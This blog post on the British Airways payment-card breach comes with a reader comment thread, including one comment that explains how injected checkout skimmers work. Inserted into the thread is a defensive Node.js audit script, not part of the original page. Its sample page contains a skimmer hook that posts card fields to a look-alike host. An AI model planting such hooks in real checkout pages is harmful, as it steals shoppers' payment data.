
What more do we know about the British Airways data breach?


Friday was one of those occasional crazy days for us.  Whenever British Airways is leading the news agenda we are normally sucked along in the tailwind, whether we like it or not.  Thanks to everyone who shared their experiences and suggestions via our comments.

I popped up in the Daily Telegraph (see here), The Guardian and Daily Express and I did a segment for talkRADIO.  I was even invited on Good Morning Britain but unfortunately (or not) the invite arrived after I had gone to bed on Thursday.

What did we actually learn though?

The key revelation yesterday was the sheer breadth of data that was stolen.


We know that 380,000 bookings were compromised.  These were made between 22:58 on 21st August and 21:45 on 5th September.  For all of those bookings, the hackers have your:

  • email address
  • postal address
  • credit card number
  • expiration date
  • CVV

… according to Alex Cruz on Radio 4.  The CVV data gives a clue as to how this happened.  Companies are not allowed to store CVV numbers (the card industry's PCI DSS rules forbid retaining them after a payment is authorised).  This means that the data was stolen on the journey from the BA IT system to BA’s payment processing company, not lifted from a stored database.

Who was impacted?

It still isn’t clear.  British Airways has said that only bookers at ba.com and via the mobile app were affected.

However, various reports in our comments and elsewhere suggest that people who have booked via telephone and with BA Holidays are receiving emails saying their details are compromised.  People who have only had money REFUNDED are also reporting getting the email.  It is probably best to assume that any transaction you’ve made which led to a BA credit card charge or refund is likely to be at risk.

Am I at risk if I didn’t make a booking?

No.  Any stored cards you have at ba.com were not compromised.

No passport or flight data was stolen either, as this is not passed to the payment processing company.

Whilst ba.com now says “The personal and financial details of customers making or changing bookings on ba.com and the airline’s mobile app were compromised.”, my reading of this is that you only have issues if you made a change which incurred a change fee.  Paying the change fee will have exposed your card details.

Will BA be fined for this?

Almost certainly, under the new GDPR regime which came into force this year.  It is likely to be the first major penalty enforced since those rules were adopted.  It will be interesting to see what level it is set at, given that the cap is 4% of BA’s (huge) turnover.

IAG’s share price fell 3.6% yesterday morning as investors worried about compensation payments and the impact on future bookings, but it had recovered to a 1.35% fall by the end of the day.  The overall market was only down 0.55%.

Talking of the new regulations …

This, from the ICO website, is what the Information Commissioner’s Office says a company has to tell its customers when it discovers a breach.  British Airways did not comply with this in its original email to those who were impacted, which is why it had to send a second email last night.  These are the rules:

“You need to describe, in clear and plain language, the nature of the personal data breach and, at least:

  • the name and contact details of your data protection officer (if your organisation has one) or other contact point where more information can be obtained;
  • a description of the likely consequences of the personal data breach; and
  • a description of the measures taken, or proposed to be taken, to deal with the personal data breach and including, where appropriate, of the measures taken to mitigate any possible adverse effects.”

Should I proactively cancel my credit card?

There is no evidence yet of any card fraud linked to this breach.

This in itself is odd.  Why go to all the trouble of stealing this data if you are not going to cash in on it?

American Express has decided to do nothing.  If you want full peace of mind, I recommend reporting your card as ‘lost’ via the website, which will trigger a new one.  Monzo, Starling, Virgin Money and Tesco Bank, amongst others, have said that any card which was used for a BA transaction will automatically be replaced.

If you want to know more …

There is a dedicated British Airways web page with more information which you can find here.


Comments (105)

This article is closed to new comments. Feel free to ask your question in the HfP forums.

  • Terry S says:

    I booked flights on BA website using my BA Amex during those dates – this was the response I received from Amex yesterday;
    ‘There is no action you need to take – we will contact you immediately if there’s any unusual activity with your Account. In the meantime you can continue to use your Card as normal’

    So far no unusual payments on my account. As Rob says it’s odd they don’t appear to have taken money from anyone…

  • Roger1* says:

    Further to Paul’s comment (08:48) about Cruz,

    I saw and heard Cruz several times on BBC radio and TV, Channel 4/ITN and LBC yesterday. He badly needs to go back to his media training course, repeat and learn.

    He made the point that in over 20 years, ba.com had not suffered a breach as bad as this. OK, and the point is what, exactly?

    The behaviour was ‘criminal’. Good to know.

    ‘It’s not our fault.’ He didn’t say that, but it is what he was trying to imply.

    He said he ‘sympathized’. I feel so much better now that I know this.

    This can’t be blamed on poor English. His English was very good, of course. More likely, he was less than fully briefed and jumped in in front of the cameras and microphones without fully thinking.

    He gave the wrong image. He didn’t look at all in charge. Sorry, As a damage limitation exercise, it failed.

    • Leon Foster-Hill says:

      He simply has to go, his race to the bottom and lack of investment in what is needed to run our premier airline.

  • anon says:

    To all those interested in how other similar data breaches work.

    1 – the hacker obtains access to the template/skin files, or a database field that outputs HTML directly in to the template

    2 – the hacker adds a section of JavaScript which sends the contents of all desired form elements (so, perhaps anything within a form with the ID of #checkout) off to some third party URL immediately prior to submission. Most often the JavaScript is actually stored in a file on a third party URL (again, obfuscated to blend in as well as possible).

    3 – (normally) the hacker collects the details as they are passively submitted to third party URLs, and sells them as quickly as possible on the dark web (normally).

    In essence – the data isn’t intercepted *during* the submission to the processor; it is sent by the victim’s browser at exactly the same time (separately). You hit ‘Pay’ or ‘Submit’ (or whatever) and the payment button on your browser does what the javascript tells it to do, before going on to do what it is supposed to do.

    This is why they will have CVVs even though they are never stored.

    The fact that point 3 hasn’t happened makes me believe that this isn’t one of ‘normal’ Russian hackers but perhaps somebody working within.

    • Graham Walsh says:

      That is exactly my thinking, the attack came from inside, so uploaded modified code to the payment processing page. Now surely they have an audit trail of everyone who commits a change to the website pages/templates. It would require a login. Unless they all shared a login to the site, then it could have been anyone with the details.

      • Lili says:

        If they keep audit trail (as they should) and you have to login, I can’t imagine anybody being THAT stupid. It would be like leaving not just a murder weapon with all your fingerprints on it, but a business card on top.
        Then again, as you say, might be that there is shared login, or other loophole to change the code. Can’t say I’d be surprised.
        Shame we will probably never know the root cause. Whenever something goes so spectacularly wrong there’s usually a couple of things coinciding.
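The thread above describes the pattern behind the CVV clue in the article (an injected script that hooks the checkout form and beacons the fields to a third-party host before the real submission happens), and the replies ask how a site would notice. The following is an added example, not code from Head for Points, British Airways or any commenter: a small Node.js audit that lists every script on a checkout page, flags external scripts served from hosts outside an allowlist, and flags inline scripts that both hook form submission and call out to a host outside that allowlist. It also builds the Content Security Policy a defender would pair with that allowlist. The host names, the sample page and the `serialiseForm` reference in it are all invented placeholders.

```javascript
'use strict';

// Added example (not the page's or BA's code). Audits the <script> tags of a
// checkout page against an allowlist of first-party hosts, the check a defender
// runs to catch the injected-skimmer pattern described in the comment thread.

// Assumed first-party hosts that may serve scripts or receive checkout data.
const ALLOWED_HOSTS = new Set([
  'www.example-airline.test',
  'static.example-airline.test',
]);
const PAGE_ORIGIN = 'https://www.example-airline.test/'; // assumed page origin

// Constructed sample checkout page: two legitimate scripts, one legitimate
// inline call, plus an injected external script and an injected inline hook.
// serialiseForm() is deliberately undefined; the sample is audit input only.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="checkout" action="/pay" method="post">
  <input name="card_number"><input name="cvv"><button>Pay</button>
</form>
<script src="/js/jquery.js"></script>
<script src="https://static.example-airline.test/js/checkout.js"></script>
<script src="https://cdn.look-alike-host.test/js/modernizr.js"></script>
<script>
  // injected: runs on submit and copies the fields to a third-party host
  document.querySelector('#checkout').addEventListener('submit', function () {
    fetch('https://cdn.look-alike-host.test/collect', { method: 'POST', body: serialiseForm() });
  });
</script>
<script>
  // legitimate first-party inline code
  fetch('https://www.example-airline.test/api/session', { credentials: 'include' });
</script>
</body></html>`;

const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR = /\bsrc\s*=\s*["']([^"']+)["']/i;
const ABSOLUTE_URL = /https?:\/\/[A-Za-z0-9.-]+/g;
const SUBMIT_HOOK = /\b(submit|onsubmit)\b|#checkout/;

// Resolve an absolute or relative URL to its hostname, relative to the page origin.
function hostOf(url, pageOrigin) {
  return new URL(url, pageOrigin).hostname;
}

// Pull every <script> out of the HTML: external ones keep their src, inline ones their body.
function extractScripts(html) {
  const scripts = [];
  for (const match of html.matchAll(SCRIPT_TAG)) {
    const src = SRC_ATTR.exec(match[1]);
    scripts.push(src ? { src: src[1], code: '' } : { src: null, code: match[2] });
  }
  return scripts;
}

// One finding per script that loads from, or sends data to, a host outside the allowlist.
// Inline scripts that also hook form submission are labelled as the skimmer pattern.
function auditScripts(html, allowedHosts, pageOrigin = PAGE_ORIGIN) {
  const findings = [];
  for (const script of extractScripts(html)) {
    if (script.src !== null) {
      const host = hostOf(script.src, pageOrigin);
      if (!allowedHosts.has(host)) {
        findings.push({ kind: 'external-script', host, detail: script.src });
      }
      continue;
    }
    const foreignHosts = [...new Set(
      (script.code.match(ABSOLUTE_URL) || []).map((u) => hostOf(u, pageOrigin)),
    )].filter((h) => !allowedHosts.has(h));
    if (foreignHosts.length === 0) continue;
    findings.push({
      kind: SUBMIT_HOOK.test(script.code) ? 'inline-submit-beacon' : 'inline-foreign-request',
      host: foreignHosts[0],
      detail: script.code.trim().split('\n')[0],
    });
  }
  return findings;
}

// A Content-Security-Policy for the checkout page built from the same allowlist.
// script-src without 'unsafe-inline' blocks injected inline scripts outright;
// connect-src, img-src and form-action limit where the browser will send data
// even if a script does get in (fetch/XHR/sendBeacon, image beacons, form posts).
function checkoutCsp(allowedHosts) {
  const origins = [...allowedHosts].map((h) => `https://${h}`).join(' ');
  return [
    `default-src 'self'`,
    `script-src 'self' ${origins}`,
    `connect-src 'self' ${origins}`,
    `img-src 'self' ${origins}`,
    `form-action 'self'`,
    `frame-ancestors 'none'`,
  ].join('; ');
}

// Human-readable report lines for the sample page.
function report(html, allowedHosts) {
  return auditScripts(html, allowedHosts).map((f) => `${f.kind}: ${f.host} (${f.detail})`);
}

console.log(report(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS).join('\n'));
console.log('Content-Security-Policy: ' + checkoutCsp(ALLOWED_HOSTS));
```

Run with `node audit.js` against the embedded sample and it reports the look-alike CDN script and the inline submit hook, and leaves the three first-party scripts alone. In practice the audit would run against a fetched copy of the live page on a schedule, and a diff against the previous run is what catches a template change like the one the comment describes; the CSP is the complementary control, since a real site that needs inline scripts would add a per-request nonce to `script-src` rather than `'unsafe-inline'`.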

  • delbert says:

    Surely there’s potential for a compensation claim under GDPR Article 82 for material or non-material damage caused by this breach.

    How one goes about this is the interesting bit. Can anyone elaborate?

    • Russ says:

      I wouldn’t get technical or creative if one’s experience of Compliance is limited. There should be a template letter for GDPR breaches somewhere. Stick to that like glue. If not keep it as teflon as possible i.e. Dear [insert name ?!?] I am in receipt of your correspondence dated blah blah blah the contents of which have been noted. Then give them your proposed ex gratia figure. Resist the urge to fill a blank piece of paper.

      • delbert says:

        Good point and well noted, Russ.

        As I posted on HfP last night I received a double whammy yesterday. I woke up to an email from BA yesterday morning informing that my data was compromised which originated from a rewards flight booked last Sunday. Then I get home from work last night to find a letter in my letterbox from another company informing me that my data was compromised last March.

        I’m going after both these companies with the same template and will see where I get but I’m not letting up as this is my private data that they’re playing with.

        • Shoestring says:

          All good except you haven’t suffered any damage, have you?

        • delbert says:

          Go read Article 82 GDPR, Shoestring. Material and non-material damage are covered.

        • Shoestring says:

          So what damage have you suffered? To your dignity? Having to change a credit card? Worry?

          You won’t get anywhere with that.

        • delbert says:

          My personal information is now out there, Shoestring. BA have admitted the fact. What is your point?

        • Shoestring says:

          that you haven’t suffered any damages whatsoever, so can’t claim compensation for damages

        • Slamb says:

          Hi
          Can I ask what template you are using? I made a booking with BA in this time. It’s happened before with American Express & they paid financial compensation without even asking?

    • Nicky says:

      You are correct re s82 GDPR but in reality after paying a fine for the initial breach which may run into the millions, surely if they then had to pay compensation to those who could actually prove they were targeted and lost money – this would bankrupt the airline: that is why I believe they are covering their butts by claiming they will compensate any losses suffered by individuals

  • John D says:

    Call me cynical but I don’t think the motivation was to steal and misuse customers’ payment details. If it were, we would have seen evidence of a greater rate of fraudulent transactions on the affected cards weeks ago. That hasn’t happened.

    I think whoever did this had another agenda: to cause reputational and economic damage to IAG. Whether that is someone on the inside or external may become apparent once further audit has taken place but given the nature of what’s happened, whoever was responsible must have been aware of the security vulnerabilities as this is a unique form of data security compromise which has been executed at an enormous scale.

    And I don’t think customers need to worry too much once affected cards have been replaced as all the remaining data are address/e-mail address which, by themselves, all you can do is spam people.

    • shd says:

      You don’t need to postulate outsiders causing “reputational and economic damage to IAG”, they have demonstrated over and over again they are quite capable of inflicting it by themselves!

      • FlyUpTop says:

        Haven’t seen this comment yet, will the latest fine added onto the last one result in some type of claw back from redemption values.

        • shd says:

          H4P posted months(?) ago that BA management have already signed-off on an Exec Club Avios devaluation, it’s just a matter of getting it implemented. Something to do with those pesky IT systems…

        • Doug M says:

          Perhaps also waiting for a period of time clear from any large cock-ups, before delivering more bad news.

        • shd says:

          Why would IAG need to wait to devalue BA Exec Club?

          BA has such a stranglehold on the market they don’t need to worry what their frequent fliers think, many business pax are locked in via corporate deals anyway.

  • Nick says:

    I must give it to Amex. Unlike other corporates, such as BA/IAG, they are proactively advising, and keeping their customers up to date, with the BA issue. If you go online to your Amex account(s) there is a “pop up” with advice and links.

    Good on them!

    IMHO, shame on the usual self-serving, smug, BA/IAG management!

    • Shoestring says:

      Yes, indeed.

      Hats off to Amex.

      They are doing what they always do at no extra cost and probably dissuaded a lot of over-worried morons from requesting new cards when they didn’t need to.

  • Choons says:

    Now that they have the email addresses, I wonder how many have the top 10 most common passwords. I would bet quite a few.

    123456
    password
    12345678
    qwerty, were the top four last year, to save people looking it up.

    • AndyR says:

      Most email providers don’t allow you to have those passwords, has to be a combination of letters, numbers, uppercase/lowercase, special characters etc.

    • S says:

      Zero sympathy for people who have that poor of an opsec standard.

      For them it’s always been just a matter of time. Personally, I don’t trust anything unless it comes with a 2 factor authentication.

  • Talay says:

    This already exists.

    Where we have integrated card payments into our EPoS then Verifone provide a token whereby we never know the details of the cards.

    But what is needed is a system on a Visa / Mastercard global level.

